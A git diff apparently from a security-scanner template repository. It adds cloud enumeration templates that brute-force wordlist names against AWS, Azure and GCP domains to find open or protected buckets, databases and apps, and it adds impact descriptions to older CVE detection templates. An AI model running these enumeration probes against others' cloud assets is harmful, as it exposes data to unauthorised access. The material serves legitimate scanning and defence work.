diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml
index b07f36c8e5..ce289d14dd 100644
--- a/.github/workflows/templates-sync.yml
+++ b/.github/workflows/templates-sync.yml
@@ -3,6 +3,14 @@ on:
   push:
     paths:
     - '.new-additions'
+    - 'http/cves/2015/CVE-2015-2794.yaml'
+    - 'http/cves/2023/CVE-2023-42343.yaml'
+    - 'http/cves/2023/CVE-2023-46574.yaml'
+    - 'http/exposures/docker-daemon-exposed.yaml'
+    - 'http/token-spray/api-openai.yaml'
+    - 'http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml'
+    - 'http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml'
+    - 'http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml'
   workflow_dispatch:
 jobs:
   triggerRemoteWorkflow:
diff --git a/.new-additions b/.new-additions
index 9d24e17c29..c89e7f038f 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,2 +1,19 @@
+cloud/enum/aws-app-enum.yaml
+cloud/enum/aws-s3-bucket-enum.yaml
+cloud/enum/azure-db-enum.yaml
+cloud/enum/azure-vm-cloud-enum.yaml
+cloud/enum/azure-website-enum.yaml
+cloud/enum/gcp-app-engine-enum.yaml
+cloud/enum/gcp-bucket-enum.yaml
+cloud/enum/gcp-firebase-app-enum.yaml
+cloud/enum/gcp-firebase-rtdb-enum.yaml
+http/cves/2015/CVE-2015-2794.yaml
+http/cves/2023/CVE-2023-41109.yaml
+http/cves/2023/CVE-2023-42343.yaml
+http/cves/2023/CVE-2023-46574.yaml
+http/exposures/docker-daemon-exposed.yaml
 http/token-spray/api-openai.yaml
+http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml
 http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml
+http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml
+network/misconfig/erlang-daemon.yaml
diff --git a/cloud/enum/aws-app-enum.yaml b/cloud/enum/aws-app-enum.yaml
new file mode 100644
index 0000000000..ab7ed36795
--- /dev/null
+++ b/cloud/enum/aws-app-enum.yaml
@@ -0,0 +1,37 @@
+id: aws-app-enum
+
+info:
+  name: AWS Apps - Cloud Enumeration
+  author: initstring
+  severity: info
+  description: |
+    Searches for AWS apps (WorkDocs, WorkMail, Connect, etc.)
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cloud,cloud-enum,aws
+
+self-contained: true
+
+variables:
+  BaseDNS: "awsapps.com"
+
+http:
+  - raw:
+      - |
+        GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1
+        Host: {{wordlist}}.{{BaseDNS}}
+
+    redirects: false
+
+    attack: batteringram
+    threads: 10
+
+    matchers:
+      - type: status
+        name: "Registered AWS App"
+        status:
+          - 200
+          - 302
+        condition: or
+# digest: 490a0046304402206cc21deaf3d479badf5b8b46dbe3448bd60ec76fc64503726d554051cca8a9bc02204dba37b6781d1c66eca341ac1c6c7a5041cfb376832d862700a864cc91af8870:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/enum/aws-s3-bucket-enum.yaml b/cloud/enum/aws-s3-bucket-enum.yaml
new file mode 100644
index 0000000000..7c692dda40
--- /dev/null
+++ b/cloud/enum/aws-s3-bucket-enum.yaml
@@ -0,0 +1,41 @@
+id: aws-s3-bucket-enum
+
+info:
+  name: AWS S3 Buckets - Cloud Enumeration
+  author: initstring
+  severity: info
+  description: |
+    Searches for open and protected buckets in AWS S3
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cloud,cloud-enum,aws
+
+self-contained: true
+
+variables:
+  BaseDNS: "s3.amazonaws.com"
+
+http:
+  - raw:
+      - |
+        GET http://{{wordlist}}.{{BaseDNS}} HTTP/1.1
+        Host: {{wordlist}}.{{BaseDNS}}
+
+    redirects: false
+
+    attack: batteringram
+    threads: 10
+
+    matchers-condition: or
+    matchers:
+      - type: status
+        name: "Open AWS S3 Bucket"
+        status:
+          - 200
+
+      - type: status
+        name: "Protected AWS S3 Bucket"
+        status:
+          - 403
+# digest: 4b0a00483046022100c0cbb1d95cb9a7d7b9bd7a4bf578af739426ab59afa3faa001104c29c4ff999e022100cdfc9930e3c0ae01086792f1391ff33c22070722d3bd874d1e3f87f31c938a17:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/enum/azure-db-enum.yaml b/cloud/enum/azure-db-enum.yaml
new file mode 100644
index 0000000000..8a3ec2887d
--- /dev/null
+++ b/cloud/enum/azure-db-enum.yaml
@@ -0,0 +1,32 @@
+id: azure-db-enum
+
+info:
+  name: Azure Databases - Cloud Enumeration
+  author: initstring
+  severity: info
+  description: |
+    Searches for Azure databases via their registered DNS names
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cloud,cloud-enum,azure
+
+self-contained: true
+
+variables:
+  BaseDNS: "database.windows.net"
+
+dns:
+  - name: "{{wordlist}}.{{BaseDNS}}"
+    type: A
+    class: inet
+
+    recursion: true
+
+    attack: batteringram
+    matchers:
+      - type: word
+        part: answer
+        words:
+          - "IN\tA"
+# digest: 4a0a004730450221008d5f64c419db15f1c1bce4a802f395bdcc44847f878890831869236c37a1678002205d7502015cece8506d34b9c319643441e334856c7fd34e1baa70a6a6942f134e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/enum/azure-vm-cloud-enum.yaml b/cloud/enum/azure-vm-cloud-enum.yaml
new file mode 100644
index 0000000000..7ed0d03f3c
--- /dev/null
+++ b/cloud/enum/azure-vm-cloud-enum.yaml
@@ -0,0 +1,65 @@
+id: azure-vm-cloud-enum
+
+info:
+  name: Azure Virtual Machines - Cloud Enumeration
+  author: initstring
+  severity: info
+  description: |
+    Searches for Azure virtual machines via their registered DNS names.
+  metadata:
+    verified: true
+  tags: cloud,cloud-enum,azure
+
+self-contained: true
+
+variables:
+  BaseDNS: "cloudapp.azure.com"
+  regionname:
+    - eastasia
+    - southeastasia
+    - centralus
+    - eastus
+    - eastus2
+    - westus
+    - northcentralus
+    - southcentralus
+    - northeurope
+    - westeurope
+    - japanwest
+    - japaneast
+    - brazilsouth
+    - australiaeast
+    - australiasoutheast
+    - southindia
+    - centralindia
+    - westindia
+    - canadacentral
+    - canadaeast
+    - uksouth
+    - ukwest
+    - westcentralus
+    - westus2
+    - koreacentral
+    - koreasouth
+    - francecentral
+    - francesouth
+    - australiacentral
+    - australiacentral2
+    - southafricanorth
+    - southafricawest
+
+dns:
+  - name: "{{wordlist}}.{{regionname}}.{{BaseDNS}}"
+    type: A
+    class: inet
+
+    recursion: true
+
+    attack: batteringram
+
+    matchers:
+      - type: word
+        part: answer
+        words:
+          - "IN\tA"
+# digest: 4b0a004830460221008d223bfdb3585e335e8282ca206945a6f7704dab4a2899d3410229bf0db7132d022100b9de9af2b393a559575b67a5b25b6334fe8cddd1ceed5059ee634dc3b0292d50:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/enum/azure-website-enum.yaml b/cloud/enum/azure-website-enum.yaml
new file mode 100644
index 0000000000..94737b9889
--- /dev/null
+++ b/cloud/enum/azure-website-enum.yaml
@@ -0,0 +1,36 @@
+id: azure-website-enum
+
+info:
+  name: Azure Websites - Cloud Enumeration
+  author: initstring
+  severity: info
+  description: |
+    Searches for Azure websites that are registered and responding.
+  metadata:
+    verified: true
+  tags: cloud,azure
+
+self-contained: true
+
+variables:
+  BaseDNS: "azurewebsites.net"
+
+http:
+  - raw:
+      - |
+        GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1
+        Host: {{wordlist}}.{{BaseDNS}}
+
+    redirects: false
+
+    attack: batteringram
+    threads: 10
+
+    matchers:
+      - type: status
+        name: "Available Azure Website"
+        status:
+          - 200
+          - 302
+        condition: or
+# digest: 490a00463044022001ff1a4cff9e33f3817df1e824a00e35f76c6f8e22cd34e3616e452978dc46f702200913c7710eba2b3df98325a1bb7da86b55cde6d4a3d7199a7d952f1f7988a3fa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/enum/gcp-app-engine-enum.yaml b/cloud/enum/gcp-app-engine-enum.yaml
new file mode 100644
index 0000000000..25da290f22
--- /dev/null
+++ b/cloud/enum/gcp-app-engine-enum.yaml
@@ -0,0 +1,42 @@
+id: gcp-app-engine-enum
+
+info:
+  name: GCP App Engine (Appspot) - Cloud Enumeration
+  author: initstring
+  severity: info
+  description: |
+    Searches for App Engine Apps in GCP.
+  metadata:
+    verified: true
+  tags: cloud,cloud-enum,gcp
+
+self-contained: true
+
+variables:
+  BaseDNS: "appspot.com"
+  loginRedirect: "accounts.google.com"
+
+http:
+  - raw:
+      - |
+        GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1
+        Host: {{wordlist}}.{{BaseDNS}}
+
+    redirects: false
+
+    attack: batteringram
+    threads: 10
+
+    matchers:
+      - type: dsl
+        name: "Open GCP App Engine App"
+        dsl:
+          - "status_code==200"
+
+      - type: dsl
+        name: "Protected GCP App Engine App"
+        dsl:
+          - "status_code==302"
+          - contains(location, "login")
+        condition: and
+# digest: 490a0046304402204edc5a3fc90ff80b8397219e37a716d5b582c9821dbb0edda2c52c585aa241ca022067b0c7178f7f345975f765bdd56afc967505028e459ed113c8fbd450a1dcb76a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/enum/gcp-bucket-enum.yaml b/cloud/enum/gcp-bucket-enum.yaml
new file mode 100644
index 0000000000..6889edcaad
--- /dev/null
+++ b/cloud/enum/gcp-bucket-enum.yaml
@@ -0,0 +1,39 @@
+id: gcp-bucket-enum
+
+info:
+  name: GCP Buckets - Cloud Enumeration
+  author: initstring
+  severity: info
+  description: |
+    Searches for open and protected buckets in GCP.
+  metadata:
+    verified: true
+  tags: cloud,cloud-enum,gcp
+
+self-contained: true
+
+variables:
+  BaseDNS: "storage.googleapis.com"
+
+http:
+  - raw:
+      - |
+        GET http://{{wordlist}}.{{BaseDNS}} HTTP/1.1
+        Host: {{wordlist}}.{{BaseDNS}}
+
+    redirects: false
+
+    attack: batteringram
+    threads: 10
+
+    matchers:
+      - type: status
+        name: "Open GCP Bucket"
+        status:
+          - 200
+
+      - type: status
+        name: "Protected GCP Bucket"
+        status:
+          - 403
+# digest: 490a004630440220549241cfe0dbdadf24bcbdabd6cbf8e82a45bea577710e8409da53f3bdef37d202203bab8b09dea7b68aafc32f8214b331ee6dc4dbe85c0e7a34693b8062dec6fb6a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/enum/gcp-firebase-app-enum.yaml b/cloud/enum/gcp-firebase-app-enum.yaml
new file mode 100644
index 0000000000..45a6277ff7
--- /dev/null
+++ b/cloud/enum/gcp-firebase-app-enum.yaml
@@ -0,0 +1,34 @@
+id: gcp-firebase-app-enum
+
+info:
+  name: GCP Firebase Apps - Cloud Enumeration
+  author: initstring
+  severity: info
+  description: |
+    Searches for Firebase Apps in GCP.
+  metadata:
+    verified: true
+  tags: cloud,cloud-enum,gcp
+
+self-contained: true
+
+variables:
+  BaseDNS: "firebaseapp.com"
+
+http:
+  - raw:
+      - |
+        GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1
+        Host: {{wordlist}}.{{BaseDNS}}
+
+    redirects: false
+
+    attack: batteringram
+    threads: 10
+
+    matchers:
+      - type: status
+        name: "Open GCP Firebase App"
+        status:
+          - 200
+# digest: 490a004630440220721a516d58d71b3c20990c97c22986fd212caafa366f2641bdb4fe9df0a53f9802205ecd4bfcda0808d5002e9d1194e0ec0f4d2b2f2140170c0df4ffb11372a6470f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/enum/gcp-firebase-rtdb-enum.yaml b/cloud/enum/gcp-firebase-rtdb-enum.yaml
new file mode 100644
index 0000000000..27a2ee646e
--- /dev/null
+++ b/cloud/enum/gcp-firebase-rtdb-enum.yaml
@@ -0,0 +1,50 @@
+id: gcp-firebase-rtdb-enum
+
+info:
+  name: GCP Firebase Realtime Database - Cloud Enumeration
+  author: initstring
+  severity: info
+  description: |
+    Searches for Firebase Realtime Databases in GCP.
+  metadata:
+    verified: true
+  tags: cloud,cloud-enum,gcp
+
+self-contained: true
+
+variables:
+  BaseDNS: "firebaseio.com"
+
+http:
+  - raw:
+      - |
+        GET https://{{wordlist}}.{{BaseDNS}}/.json HTTP/1.1
+        Host: {{wordlist}}.{{BaseDNS}}
+
+    redirects: false
+
+    attack: batteringram
+    threads: 10
+
+    matchers-condition: or
+    matchers:
+      - type: status
+        name: "Open GCP Firebase RTDB"
+        status:
+          - 200
+
+      - type: status
+        name: "Protected GCP Firebase RTDB"
+        status:
+          - 401
+
+      - type: status
+        name: "Payment GCP on Google Firebase RTDB"
+        status:
+          - 402
+
+      - type: status
+        name: "Deactivated GCP Firebase RTDB"
+        status:
+          - 423
+# digest: 490a0046304402200dcb47ae02c77c619eea0d95a6ab7dc9f2be071cea09abee3a7ab748b11e561c022034956ced05346f9cfcc9d425d92fa1242c979572e8ae02030496597f64ccfe82:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cves.json b/cves.json
index b67a7f0312..5227679936 100644
--- a/cves.json
+++ b/cves.json
@@ -271,6 +271,7 @@
 {"ID":"CVE-2015-2166","Info":{"Name":"Ericsson Drutt MSDP - Local File Inclusion","Severity":"medium","Description":"Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2166.yaml"}
 {"ID":"CVE-2015-2196","Info":{"Name":"WordPress Spider Calendar \u003c=1.4.9 - SQL Injection","Severity":"high","Description":"WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-2196.yaml"}
 {"ID":"CVE-2015-2755","Info":{"Name":"WordPress AB Google Map Travel \u003c=3.4 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2015/CVE-2015-2755.yaml"}
+{"ID":"CVE-2015-2794","Info":{"Name":"DotNetNuke 07.04.00 - Administration Authentication Bypass","Severity":"critical","Description":"The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-2794.yaml"}
 {"ID":"CVE-2015-2807","Info":{"Name":"Navis DocumentCloud \u003c0.1.1 - Cross-Site Scripting","Severity":"medium","Description":"Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2807.yaml"}
 {"ID":"CVE-2015-2863","Info":{"Name":"Kaseya Virtual System Administrator - Open Redirect","Severity":"medium","Description":"Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2863.yaml"}
 {"ID":"CVE-2015-2996","Info":{"Name":"SysAid Help Desk \u003c15.2 - Local File Inclusion","Severity":"high","Description":"SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.\n","Classification":{"CVSSScore":"8.5"}},"file_path":"http/cves/2015/CVE-2015-2996.yaml"}
diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt
index 71b0875aee..8953152fe4 100644
--- a/cves.json-checksum.txt
+++ b/cves.json-checksum.txt
@@ -1 +1 @@
-94707e96d497767157be7c0c5b06fac3
+8ba13563d80d4c1e36d4b6dff2c7f027
diff --git a/http/cnvd/2021/CNVD-2021-32799.yaml b/http/cnvd/2021/CNVD-2021-32799.yaml
index 796167b833..7511eb7eaf 100644
--- a/http/cnvd/2021/CNVD-2021-32799.yaml
+++ b/http/cnvd/2021/CNVD-2021-32799.yaml
@@ -4,6 +4,8 @@ info:
   name: 360 Xintianqing - SQL Injection
   author: SleepingBag945
   severity: high
+  description: |
+    The Tianqing Terminal Security Management System, designed for government and enterprise use, faces a SQL injection vulnerability. This flaw could enable attackers to access sensitive database information.
   reference:
     - https://blog.51cto.com/u_9691128/4295047
     - https://www.cnvd.org.cn/patchInfo/show/270651
@@ -38,5 +40,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a00473045022006cca5f941e35ce5c204962052c2d4eb74627fc58d6de9b9976b967b1643ea8f022100e2b50bf34a6ee4636802796f5b1e866212a29264161bbc98a5553a60186651d1:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100e6b9c102bfc4fd3eaa2d00c82e03d07f7309513da8828cc6c303d4d071c2d5540221009d3c3f3d937d8ac546abaa6d94a3aee02d5c4c7c8831dfbce456591d4b252eda:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml
index 9703e7591c..6e8ab39c98 100644
--- a/http/cves/2000/CVE-2000-0114.yaml
+++ b/http/cves/2000/CVE-2000-0114.yaml
@@ -5,6 +5,8 @@ info:
   author: r3naissance
   severity: medium
   description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
+  impact: |
+    High: Remote code execution or denial of service.
   remediation: Upgrade to the latest version.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2000-0114
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220080130ec958d5667203f63c2fb769d081d8684edeb1132b8114624eb9cefeeeb022015c92a448c22916bdc29de05205539f746ae2fc9b6b641b54ef2b913d151c11f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d75cf6bb5b96928d10a267c9d3b68c6d215cafe2f946fc1e3c6faa5ba73986d1022100cf0262c0fa9aa5da8c6f8751c553cc77be07ca9fc62f3aec8bb35a8b9f16b490:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml
index f391661eec..10c5c7f16a 100644
--- a/http/cves/2001/CVE-2001-0537.yaml
+++ b/http/cves/2001/CVE-2001-0537.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to the affected device.
   remediation: |
     Apply the appropriate patch or upgrade to a fixed version of the Cisco IOS software.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022058d9a8ffc9ad0c9eb0fa65e129eec136d44e8e6582b68665220d55745cff08270220209369d1debe9d289316990990aee95bdaa71cd748bcd23d1f7189442c298347:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201446b3c9bf46dead91bf4ef4ad77cbe180d6d69fb175901a10fa0c1ede45e8640221009f8fada5bf28bf8ede431e3ef75a13367f4164a18df286db6e1528ed038181da:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml
index 6c576e31ec..4cc511bf5f 100644
--- a/http/cves/2002/CVE-2002-1131.yaml
+++ b/http/cves/2002/CVE-2002-1131.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDk
   severity: high
   description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.
   remediation: |
     Upgrade to a patched version of SquirrelMail or apply the necessary security patches to mitigate the XSS vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100919662cf99fc2c8685a185341929e70c52f2d6e4708bffe8294fe45d56f7cb81022071b199174fe64ab885ef44d2c7d1e298ea1ee34b6eab5737b7afb1bd0b713799:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220097cefba0b33bb087a8dba970ed43866b17c92bfc316e2e3d619b9b6485b57710221009ad2de84214b6c521984839454d0766d906957945e2b51dce527cd4c0cc82c50:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml
index d6fa858eaf..dd72a4ab41 100644
--- a/http/cves/2004/CVE-2004-0519.yaml
+++ b/http/cves/2004/CVE-2004-0519.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDk
   severity: medium
   description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, phishing attacks, or defacement of the SquirrelMail interface.
   remediation: Upgrade to the latest version.
   reference:
     - https://www.exploit-db.com/exploits/24068
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205d3c4477a61a53a5207dd95d10b69b27e255779626d269dd24c329d22d574969022037aecc3ef5111112878affc3d64765c06c484c318e8435b97dcf1f44c9c9daac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009838e283e3afa06a62182a21bc8b0059f223c7716b521ee426f5a5971f3feadf022100dd82c1e652cb490cb66a1a96bc0aca2beecdf45fedf86f75b5376ac8fc69c6d3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml
index 77801a1ef9..108c014d2e 100644
--- a/http/cves/2004/CVE-2004-1965.yaml
+++ b/http/cves/2004/CVE-2004-1965.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php.
+  impact: |
+    Successful exploitation of these vulnerabilities could lead to unauthorized access, phishing attacks, and potential data theft.
   remediation: |
     Upgrade to a patched version of Open Bulletin Board (OpenBB) or apply necessary security patches to mitigate the vulnerabilities.
   reference:
@@ -37,4 +39,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
-# digest: 4a0a004730450220464a4d9ce1d6cbeaf71f551a06fd319a5a15203f7c40b1228809ef413ce6d869022100cb853dd541a12cbe5b12d10daaebc247d1b20e32d173b410d5191367fb6f5839:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100aa37066896608be1f1389ed813b9756b52f89f2581a494bf04c0e91f743d7cd3022012425b62227648da21636d2b3acaa1fdb865e29f57e39c13c84e0e2511f4c908:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml
index 9fcb975ce4..5f20ec31d2 100644
--- a/http/cves/2005/CVE-2005-2428.yaml
+++ b/http/cves/2005/CVE-2005-2428.yaml
@@ -5,6 +5,8 @@ info:
   author: CasperGN
   severity: medium
   description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).
+  impact: |
+    The vulnerability can lead to the disclosure of sensitive information, potentially compromising user privacy and system security.
   remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
   reference:
     - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c31e97e6801605f82c05e1819cf99bdb1e7ad21b859fbf96bab1d67b1496832302201de7a5c5f9fd1f832a121691d1c419464c4d56aa1261f00b415c933633470308:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202fa68c993471257cf8942b7addbd0c8ba10500cf91c42f00109404cec47f6af0022100e5d9e9567e00ffecb85211757541b21325517ca1cba3705fa3c8e4437bf71706:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml
index 0a0daef60a..20a0675c96 100644
--- a/http/cves/2005/CVE-2005-3344.yaml
+++ b/http/cves/2005/CVE-2005-3344.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access.
+  impact: |
+    An attacker can gain unauthorized access to sensitive administrative functions and potentially compromise the entire system.
   remediation: |
     Apply the latest security patches or upgrade to a patched version of Horde Groupware to fix the vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c038f1228140ac219d52db4ac935001c95f9c1d446165668109ce4beee89ce54022053555ab9030c57883e97f6b5387e415d1116add7b8c7d61fcf0f53f8f63abb6d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022012df863c30fb119eab34b1e075cfc549f79b962d5ee0256cc191605f184b042c022100ee6d6910021f8368041415f1c29568a224afa0bd4c90711c6ecef91e15f67a13:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml
index f70ba9afda..a7f24f1089 100644
--- a/http/cves/2005/CVE-2005-3634.yaml
+++ b/http/cves/2005/CVE-2005-3634.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.
   remediation: |
     Apply the latest security patches and updates provided by SAP to fix the open redirect vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
-# digest: 490a0046304402201ed65f33515c85457e0554acc0db27813e67680002c76547791a87a2528ee8f702200cf156ab25abae0ba9b6284d127206b2afbbf1449ef60b0bd8d1643a3ab35938:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100bd85215e179a268944da628fd2825c25be84f1d781f2eb54871fa7e3e13d9e9e022100d3ddb1c0a27197923318f0dd20a6ba42024cfd43b86ef1ab690f72558f0d6c36:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml
index af5db26817..3ca9ec067a 100644
--- a/http/cves/2005/CVE-2005-4385.yaml
+++ b/http/cves/2005/CVE-2005-4385.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a version of Cofax that is not affected by this vulnerability or apply the necessary patches provided by the vendor.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220109614eef224949e56be06ed96b7253bf9eeaaaca6b3e4d13bad94f187f50763022025be825f048689d4e2fb40c8cab4f5be2a16e56a263e77a4c10b8b718f948edc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
